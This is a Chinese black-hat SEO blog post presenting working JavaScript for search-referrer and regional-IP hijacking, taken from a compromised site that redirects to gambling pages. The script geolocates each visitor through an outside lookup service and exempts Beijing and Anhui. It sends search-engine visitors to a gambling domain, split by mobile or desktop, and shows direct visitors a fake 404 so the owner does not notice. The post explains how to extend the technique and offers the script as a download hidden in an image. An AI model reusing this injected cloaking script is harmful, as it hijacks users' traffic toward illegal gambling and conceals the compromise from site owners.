• 欢迎访问老司机不开车的博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入 TG群 QQ群
  • 老司机提醒您:回复"666666"无需人工审核,即可查看文章!Gmail邮箱的都需要审核!
  • 禁止带HTTP连接和联系方式广告留言。所有含有日文以及英语的评论已经屏蔽。
  • 廣告招租!衹接受比特幣和萊特幣付款。廣告沒有限制!有意向聯係 TG_1024
  • 本站的目的是仅仅是科普知识,绝对没有其他任何用意!请遵守当地相关法律法规!
  • 禁止复读机行为!第一次删除账号,第二次封IP。

老司机不开车之黑帽SEO 浏览器来路劫持+地区ip劫持 JS版本

SEO 老司机 2年前 (2017-10-18) 2485次浏览 1个评论

叫法也有很多JS劫持 JS劫持搜索引擎 来路劫持 关键字劫持 浏览器劫持 浏览器关键字劫持

简要说明:劫持搜索引擎来的网址,部分IP不劫持

又是我们最牛逼最吊的菠菜网站了

以下是来路劫持真实案例:
正常访问#bbs. a n h u I 3 6 5 .net/h o t R  a A n H

百度搜索访问#bbs. a n h u I 3 6 5 .net/h o t R  a A n H

劫持效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面。直接输入网址访问网页,跳转到404页面

JS代码:

#判断IP劫持 北京and安徽 不劫持
var jump_head = document.getElementsByTagName('head')[0];

var jump_script= document.createElement('script');

jump_script.type= 'text/javascript';

jump_script.src= 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js';

jump_head.appendChild(jump_script);

var jump_myt = setInterval(function(){

if (remote_ip_info) {

clearInterval(jump_myt);

if (remote_ip_info.city=='北*京-'||remote_ip_info.province=='北*京-'||remote_ip_info.city=='安*徽-'||remote_ip_info.province=='安*徽-') {

window.location.href = 'http:// www. a n h u I 3 6 5 .net /404.html';

}else{

go_bots_url();

}

}

},500);

#来路劫持

function go_bots_url(){

var init_flag = "93989",

bct = document.referrer,

til =document.title,

bot = ['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou', '360.cn', 'so.com', 'youdao', 'anquan', 'sm.cn'];//, 'haosou'];
#真的是什么搜索引擎都劫持

if(til.indexOf(" 番 羽    土.啬   ")!=-1 || til.indexOf("   彩*    票   .  至    尊")!=-1 || til.indexOf(" 买 .金 网 ")!=-1){

window.location.href="http:// www. a n h u I 3 6 5 .net /404.html";

return false;

}

for (var i in bot) {

if (bct.indexOf(bot[i]) != -1) {

init_flag = "1245";

browserRedirect();

}

}

if(init_flag == "93989"){

call_init_error();

}

}

#判断客户端

function browserRedirect() {

var sUserAgent= navigator.userAgent.toLowerCase();

var bIsIpad= sUserAgent.match(/ipad/i) == "ipad";

var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os";

var bIsMidp= sUserAgent.match(/midp/i) == "midp";

var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";

var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb";

var bIsAndroid= sUserAgent.match(/android/i) == "android";

var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce";

var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile";

if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) {

window.location.href= 'http://m. j s b 6 5 3 2 .com/';

} else {

window.location= 'http://www. J s b 6  5 3 2 .com/';

}

}

#正常访问返回404

function call_init_error() {

document.title = "404 Not Found";

window.location.href = 'http://www. a n h u I 3 6 5 .net/404.html';

技术分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

JS下载→←(藏在图里哦,提示:ZIP


博主在此发文(包括但不限于汉字、拼音、拉丁字母)均为随意敲击键盘所出,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能,并不代表本人局部或全部同意、支持或者反对观点。如需要详查请直接与键盘生产厂商法人代表联系。挖井挑水无水表,不会网购无快递。博主只是一名普通的互联网从业者,不懂修电脑,不会卖电脑,不会帮你盗号,不会破解开机密码,找不回你丢失的手机等,如有这样的想法请绕道! 丨本网站采用CC BY 4.0协议进行授权 , 转载请注明老司机不开车之黑帽SEO 浏览器来路劫持+地区ip劫持 JS版本
喜欢 (8)
发表我的评论
取消评论
表情 加粗 删除线 居中

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 😁
    weishushu2018-12-07 13:29 回复